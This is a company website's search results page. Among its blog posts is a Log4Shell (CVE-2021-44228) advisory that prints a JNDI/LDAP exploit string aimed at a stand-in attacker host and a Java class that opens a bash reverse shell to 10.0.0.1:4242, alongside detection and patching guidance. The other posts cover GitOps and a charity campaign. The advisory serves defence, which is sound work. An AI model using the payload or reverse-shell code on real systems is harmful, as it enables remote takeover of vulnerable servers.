Search Results

203 items found

Blog Posts (91)

  • Tech Savvy Talks Vol.2 GitOps on AWS: Simplify Kubernetes Deployments

    The second edition of the Scalefocus series Tech Savvy Talks was held on 20 October. If you are new here - Tech Savvy Talks are online events organised bi-weekly, covering various technology topics. The initiative's primary goal is to gather colleges and people with similar interests to discuss new tech trends, best practices and share knowledge and insights from their expertise. Another plus of the activity is that it's free and open to anyone. Follow Scalefocus's profile  and be the first to know about the upcoming topics and events. Now let's explore the second episode dedicated to GitOps on AWS: Simplify Kubernetes Deployments. Petar Gjorgievski was the presenter, he is a DevOps Engineer at Scalefocus based in Skopje. During his talk, he covert topics as: What is GitOps GitOps principles GItOpsbenefits How a GitOps pipeline might look like Explore the ArgoCD tool Short demo where we are going to try to configure and set up a working GitOps pipeline What exactly is GitOps GitOps is a way to do Kubernetes cluster management and application delivery. GitOps works by using Git as a single source of truth for declarative infrastructure and applications. With GitOps, the use of software agents can alert on any divergence between Git with what's running in a cluster, and check if there's a difference, Kubernetes reconcilers automatically update or rollback the cluster depending on the case. With Git at the center of your delivery pipelines, developers can use familiar tools to make pull requests to accelerate and simplify both application deployments and operations tasks to Kubernetes. Let’s talk about GitOps principles The entire system described declaratively With your application’s declarations versioned in Git, you have a single source of truth. Your apps can then be easily deployed and rolled back to and from Kubernetes. And even more importantly, when disaster strikes, your cluster’s infrastructure can also be dependably and quickly reproduced. The canonical desired system state versioned in Git With the declaration of your system stored in a version control system, and serving as your source of truth, you have a single place from which everything is derived and driven. This trivializes rollbacks which can be achieved with a simpler git revert. Using Git, you get the extra benefit to have a look into the authors of the code. Approved changes that can be automatically applied to the system This means that every time a pull request is approved and merged, you are able to sync up your cluster automatically and make a deployment without the necessity to give direct access to the cluster. Software agents to ensure correctness and alert on divergence This means that there is essentially an agent which always monitors both the current state of the cluster and the source of truth and alerts on any changes on either side of the configuration. This leads us to the Benefits of GitOps 1. Simply said, it increases productivity. Continuous deployment automation with an integrated feedback loop speeds up the time to deployment. 2. Enhanced Developer Experience Developers just have to push code to git and not worry about building containers or knowing the internal workings and configurations of the kubernetes cluster. This also makes it easier to onboard new colleagues and get them to start contributing faster. 3. Improved Stability & Higher Reliability Using Git to have more stable, reliable and reproducible rollbacks, as we mentioned previously, Git is also the only source of truth that it's the alpha and omega. It can help recover from disasters relatively quickly. 4. Consistency and Standardization Finally, Gitops offers us consistency, meaning, everything we have, our whole workflow including the application code and infrastructure code is built on top of our git repositories. Git Workflow 1. Leverages git workflow 2. Git as source of truth 3. Manage multiple environments 4. Easy rollbacks ArgoCD ArgoCD is a GitOps tool that helps with your GitOps workflows. ArgoCD can be used as a standalone tool or part of your CI/CD workflow. low. ArgoCD works with Git as a source of truth, with current Kubernetes manifests, or with Helm charts. It can be managed both declaratively through a click or a Dashboard which is quite nice, to be honest. It can be deployed inside of your cluster or outside of it and it works as General commanding its army with the way that it operates in the whole GitOps workflow. For more – watch the demo. There are alternatives like for example Flux, Jenkins X, and a few others as well. But we are sticking with ArgoCD. ArgoCD Positives 1. Container native workflow 2. Event based dependency manager for K8s 3. Declarative continuous delivery for K8s 4. Dashboard With all that cleared out, we can proceed with the DEMO. You can watch it here and the whole Tech Savvy talk where Petar Gjorgievski shared a lot more details and knowledge on the mentioned topics and many more, for example - а model of a GitOps Pipeline and a Setup. Got your interest? To see the talks and check what’s next, don’t forget to sign up for the following events: Scalefocus Events | Eventbrite Oh last but not least, it’s not all, so work-oriented, we have some gifts for you. Attend the next Tech Savvy Talk and get yours. See you there.

  • How to address the critical Log4Shell/LogJam vulnerability

    Yordan Popov, Security Engineer On the 9th of December 2021 a zero-day exploit, affecting the popular Аpache Log4j utility was made public CVE-2021-44228. This vulnerability is actively being exploited and anyone using Log4j should take immediate actions to remediate this critical to security component. In this article we will go over the vulnerability and it’s remediations. TL;DR CVE-2021-44228 impacts Apache Log4J Java library Easy to exploit, high impact, achieves RCE (Remote code execution) with system-level permissions Patch Log4J to version >=2.15.0 What is Log4j? Java-based library used for logging in big percentage of the Java applications. According to Maven Central Repository Log4j is used in 16,601 open-source projects Some of the confirmed vulnerable organisations / components are: Apple Minecraft Steam Twitter Elasticsearch And many others. For additional information on the confirmed vulnerable services. Vulnerability The following payload would exploit this vulnerability: ${jndi:ldap://attacker.com/a} Using the JNDI interface, log4j will download a .class file and deserializes it in unsafe manner. Utilizing the built-in feature of Java - static initializer (code in a static initializer block is executed by the virtual machine when the class is loaded.) a RCE can be achieved. Of course there are other ways to achieve code execution, that’s why patching is very important. If the JVM property com.sun.jndi.ldap.object.trustURLCodebase is set to true, other possibility would be utilizing LDAP ObjectFactory. LDAP ObjectFactory lets the LDAP response tell where to get the bytecode of another ObjectFactory. public class ReverseShell implements ObjectFactory { @Override public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { Runtime r = Runtime.getRuntime(); p = r.exec(getShellPayload()); p.waitFor(); return null; } public String getShellPayload(){ return new StringBuilder() .append("/bin/bash -c \'") .append("exec 5<>/dev/tcp/10.0.0.1/4242;") .append("cat <&5 | ") .append("while read line; ") .append("do $line 2>&5 >&5; ") .append("done\'") .toString(); } } According to LunaSec JDK version greater than 6u211, 7u201, 8u191, and 11.0.1 do not seem to be affected by the above LDAP attack, since com.sun.jndi.ldap.object.trustURLCodebase is set to false , however the other method is working. Impact Logging untrusted user input, can result in Remote Code Execution if a vulnerable version of Log4j is used. The impact is critical, since it’s relatively easy to exploit (just a single line which is logged!) and it achieves system-level privileges. As a result CVE-2021-44228 is rated perfect 10/10 CVSS Score How to test There are multiple ways to detect if you are vulnerable. Check logs - someone might have exploited it already! Use open source tool like LogShell-Detector Utilize Huntress Online Tool Trigger DNS query either by using your own authoritative DNS server or the following open source web app CanarayTokens.org Go to https://canarytokens.org/generate# Generate DNS Token (something like hq61hp3upawijfa7zqqdcdm60.canarytokens.com), put your email address. Craft the following payload: ${jndi:ldap:///a} something like: ${jndi:ldap://hq61hp3upawijfa7zqqdcdm60.canarytokens.com/a} Place it everywhere where user input is provided and might be logged (search forms, profile data, HTTP Headers, … etc) If an email is received that a DNS lookup is performed then you are vulnerable! Remediation Best way to mitigate that is by patching to a version >=2.15.0 However keep in mind that you will not be able to patch the vulnerability if a vulnerable version of Log4j is used in a dependency which you are importing, for this reason set log4j2.formatMsgNoLookups to true (Log4J >=2.10) and monitor the logs, also add YARA rules if possible. Another mitigation is completely removing the JndiLookup class from the classpath, but that my affect the usability of the application. CyberSec Risk Manager - CsRM With our platform CsRM we were able to detect the Log4j vulnerability within less than 16h hours of it being publicly available, allowing our customers to take immediate actions to their affected services. The CsRM platform monitors your vulnerabilities, risk & compliance in all Open Source Code Components, Infrastructure and Cloud, empowering you to take accurate and informed decisions for your business at any time. For more information check out - CsRM References https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b https://www.blumira.com/cve-2021-44228-log4shell/ https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/ https://www.cloudsavvyit.com/15042/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet/ https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

  • Free medical checks and early diagnostics of prostate cancer in December

    The software company Scalefocus provides over 80 prophylactic medical checks in Acibadem City Clinic Tokuda Hospital through the initiative IT Beards The third edition of the IT Beards initiative of Scalefocus provides over 80 free prophylactic medical checks for early diagnostics of prostate cancer in men at risk ages. The charity campaign, part of Movember, was conducted throughout the month of November. Scalefocus created a special platform for the cause on which employees of the company published photos of their beards and moustaches, generating votes for their special vision. The generated funds will be donated to Acibadem City Clinic Tokuda Hospital to conduct medical screening at the Clinic of Urology, led by Prof. Kaloyan Davidov. The checks will take place in December. Registrations could be made at phone: 02/403 4000. The goal of the initiative is to provide timely access to specialized health assistance, as the prevention and early diagnostics of this malicious disease is of utmost importance for the course of its treatment. The prostate cancer can be cured if diagnosed on time. The disease has no symptoms, and if any appear, this usually happens at a late stage. The free medical checks are recommended for men over 50 years, or, in case of family history of the disease, over 45 years of age. The gathered funds from the IT Beards campaign will be realized in partnership with Acibadem City Clinic Tokuda Hospital and the CancerCare.bg foundation. ‘Health is a matter of responsibility to yourself and to your family, to people whom you love and who love you. If we face a challenging situation, we should first try to accept it and then soundly assess what could be of help, instead of fighting against it, so that we can continue living a good life, as much as possible.’ MD Margarita Tarejn, clinical psychologist and a member of the multidisciplinary team at the University Hospital Tokuda, participating at the campaign devoted on men’s health.

View All

Pages (112)

  • | Scalefocus

    Services Services Consulting & Design Technology Strategy Software Architecture Program Management Business Analysis Security Consulting Digital Engineering Software Engineering UI Engineering Mobile Everything Data & Analytics Internet of Things Intelligent Automation Robotic Process Automation ML & AI Application Integration Business Process Management Infrastructure & Operations Cloud & DevOps Cybersecurity Application Support Infrastructure Support Solutions Solutions Solutions Application Continuity Center Cybersecurity Risk Manager E-Commerce Platforms Salesforce Apttus SAP INSIS Our work Our work How We Engage Full Lifecycle Delivery Managed Services Consultancy & Technological Services Case Studies Logistics Finance & Banking E-Commerce & Retail Insurance Healthcare & Life science Manufacturing Telecom & Media Energy & Utilities Technology About About Company Who We Are Leadership Team Board of Directors Awards & Recognitions Stories Customer Testimonials People Success Stories CSR News Press Releases Careers Contact us

  • Scalefocus | Software Development & Digital Services

    Let’s Laugh, Code, Grow Together Find your dream job See how we do IT Our Services We provide software development and digital services that enable organizations to operate, innovate and scale their business, by leveraging cutting-edge technologies, top talent and cross-industry expertise. Strategy & Advisory Technology Strategy Software Architecture Program Management Business Analysis Security Consulting View More Digital Engineering Software Engineering UI Engineering Mobile Everything Data & Analytics View More Intelligent Automation ML & AI Application Integration Internet of Things View More Infrastructure & Operations Cloud & DevOps Cybersecurity Application Support Infrastructure Support View More This is Mobile only Strip Strategy & Advisory Technology Strategy / Software Architecture / Project Management / Business Analysis / Security Consulting Digital Engineering Software Engineering / UI Engineering / Mobile Everything / Data & Analytics / Quality Engineering View More Intelligent Automation Robotic Process Automation / ML & AI / Application Integration / Business Process Management / Internet of Things View More Infrastructure & Operations Cloud & DevOps / Security Operations Center / Application Support / Infrastructure Support View More We are partnering with the world’s Leading Technology Companies Our Solutions We deliver technology driven solutions that help organizations to solve complex business challenges and accelerate innovation, by utilizing our pre-built frameworks and domain specific know-how. Samantha May Marketing Executive I'm a paragraph. Click here to add your own text and edit me. It’s easy. Just click “Edit Text” or double click me. Application Continuity Center Guarantee the continuity of all your critical systems Enabling organizations to overcome incidents by leveraging data-driven incremental improvements, AI and swarm intelligence. Learn more Learn more Samantha May Marketing Executive I'm a paragraph. Click here to add your own text and edit me. It’s easy. Just click “Edit Text” or double click me. Cybersecurity Risk Manager Continuously assess your Cyber Threats Empowering organizations to quantify and address the ever-increasing cyber threats. Learn more Learn more Samantha May Marketing Executive I'm a paragraph. Click here to add your own text and edit me. It’s easy. Just click “Edit Text” or double click me. E-Commerce Omnichannel commerce for the large enterprise Helping enterprises create unified customer journey and reduce total cost of ownership with Cloud-native eCommerce omni-channel solution and marketplace. Learn more Learn more We deliver solutions with Industry Leading Platforms Our Achievements Founded in 2012, today Scalefocus is the biggest Bulgarian owned software engineering company. 500+ Completed Projects 300+ Clients Worldwide 100+ Awards & Recognitions 9.2 /10 Customer Net Promoter Score “At our core, we are an engineering company - passionate about designing and building solutions that harness cutting-edge technologies, and enable businesses to operate, innovate and scale within a truly digital world. Our strength and advantage lies in our agility, cross-industry expertise and top talent pool.” Ivan Ivanov CEO, Scalefocus Our Work We have a global client base that includes Fortune 500 companies, innovative startups and industry leaders in Information Technology, E-Commerce, Insurance, Healthcare, Finance and Energy & Utilities. Telecom & Media Doubling Productivity with Offshore Software Development Center Read more Healthcare & Life Science Next Level DevOps Maturity with Azure DevOps Server Read more Healthcare & Life Science Automated Claim Settlement Cuts Down Processing Time in Half Read more Explore all What our clients say about us “We have been partnering with Scalefocus for a number of our projects since 2016. Working together, our engineering teams have helped position Paysafe as a leading payment solutions provider powered by great technology within the fast-paced payments industry.” – Miroslav Bojilov, Paysafe Our Stories See how we are transforming businesses and delivering digital innovation by reading client success stories, staying up to date on our current endeavors, virtual events and more. Tech Savvy Talks Vol.2 GitOps on AWS: Simplify Kubernetes Deployments 20.12.2021 г. Read more How to address the critical Log4Shell/LogJam vulnerability 10.12.2021 г. Read more Free medical checks and early diagnostics of prostate cancer in Decemb 9.12.2021 г. Read more Read all Get in Touch Please select the reason for your inquiry: Sales Careers General Information I confirm that I have read and understood ScaleFocus’ Privacy Policy I would like to receive the latest business and technical insights by email. Let’s talk! * Indicates required fields createLead

  • Energy and Utilities Solutions I Scalefocus

    Energy And Utilities: Fueling Your Future Growth Today We help Energy & Utilities companies to streamline their operations and thrive as digital powerhouses driven by data and technologies Visit us at E-World 2022, Stand: 2-119, 8-10 February, Essen, Germany If you happen to be in town, we would like to meet you in person and chat about how we can help you innovate and meet the challenges of tomorrow. Book a meeting Why Scalefocus? Our Services Our Work Get in Touch Are You Ready for Tomorrow? Do you fully understand what technologies are available and applicable to your needs? Are you a master of your data or are topics such as data collection, data cleansing & standardization, data streaming and data analytics still on the agenda? Is your ETRM system and trading IT landscape fully in the cloud already? Have you conquered AI, ML and predictive analytics? Does your ETRM system landscape fit all your needs or is it up for modernization? Is your business able to respond to the demand for mobility? Are your employees and shareholders able to use a mobile app to check on daily updates & access business processes? Have you already harnessed the possibilities of a complete and modern systems integration architecture? No? Maybe? Let’s talk! We have a comprehensive understanding of the energy sector and its challenges. Explore further our services and find out where we can add value to your IT operations. Why Scalefocus We are an end-to-end services provider that delivers strategic consulting and development of data management, infrastructure, ETRM, and mobile solutions through innovative technology, domain experience, and specialization We remove data silos and connect your data in a single, actionable ecosystem that leverages data and analytics to give you a competitive advantage We offer the full spectrum of software development services, from upgrade and migration of legacy systems, custom, and reusable market analytics solutions, ETRM and Energy Software Development, cloud, IoT, RPA, and intuitive mobile applications We reduce costs and optimize operational efficiency, and assets management through intelligent automation, cloud infrastructure, and strategic consultancy Our Services Intelligent Data Management & Analytics High-quality data enables companies to harvest insights and accurate forecasts to understand their network and assets. We develop scalable data platforms that remove data silos and foster data centralization. We enhance operational and analytical data management using data lakes, data & streaming analytics platforms. Consulting Services in Energy Trading and ETRM Products We are experienced in Business process modelling in the area of Energy Trading including: ■ Implementation of Custom, OTC & Exchange-traded products ■ Automating business processes ■ Implementing solutions to comply with specific regulatory requirements ETRM Systems Implementation & Energy Software Development Our consultants are experienced in large-scale ETRM systems implementation, redesign and development projects as well as trading landscape transformations that drive strategic results. We have vast expertise in Greenfield implementations, ETRM system upgrades, custom ETRM system development as well as process redesign and integration with other systems. Cloud Solutions You can’t be a next-gen digital utility if you don’t have one foot in the cloud. Moving to the cloud reduces IT spending, increases security and resilience. We establish cloud migration strategies and build hybrid cloud solutions. Our experts have experience with cloud-native systems redesign and complete solutions for Trading operations. Mobile Solutions We develop native mobile applications for both Android and iOS. We have extensive experience with enterprise solutions used to empower our customers’ employees in their day-to-day operations. IoT Services Smart grids and metering generate substantial data volumes, and IoT creates numerous new data points that put additional pressure on the IT infrastructure. We enable intelligent networks with smart metering, smart grids, and e-mobility fleet management. RPA The industry`s evermore fast pace constantly increases data intensive and manual risk processes as well as the need for reconciliation. To tackle this, we utilize RPA and realize cost optimizations along the value chain, where repetitive and rule-based tasks within Middle and Back Office processes can be automated. Systems Integration The growing need for coordination and interconnectivity between different entities and their systems is at the core of our Systems Integration Services. We develop and deliver detailed Training programs on SOA (Service Oriented Architecture) and microservices architecture which is a first step towards a redesigned and decentralized ETRM and IT systems landscape. Solutions Selection Consultancy According to Energy Risk’s 2021 Software Survey, 70% of respondents said the biggest IT challenge for energy risk managers and traders was “understanding what new technologies are available and applicable”. Our consultants will find the right technological solution for your unique business situation. Enterprise Resource Planning We establish the backbone of every intelligent enterprise through implementation and migration to SAP S/4HANA ERP. We are building event-oriented resource planning systems which provide a repository of business and system events that measure the success of all automated and human-driven business operations. Our Work Energy & Utilities Next-Generation Digital Platform for Energy Supply and Sales Read more Energy & Utilities Real-time Analytics and Data Visualization Platform Read more Energy & Utilities Increasing Employee Engagement with Energy Market Insights Read more Get in Touch Let’s get started! Get in touch with our experts to discuss your digital transformation. I confirm that I have read and understood Scalefocus’ Privacy Policy I would like to receive the latest business and technical insights by email. SUBMIT * Indicates required fields createLead

View All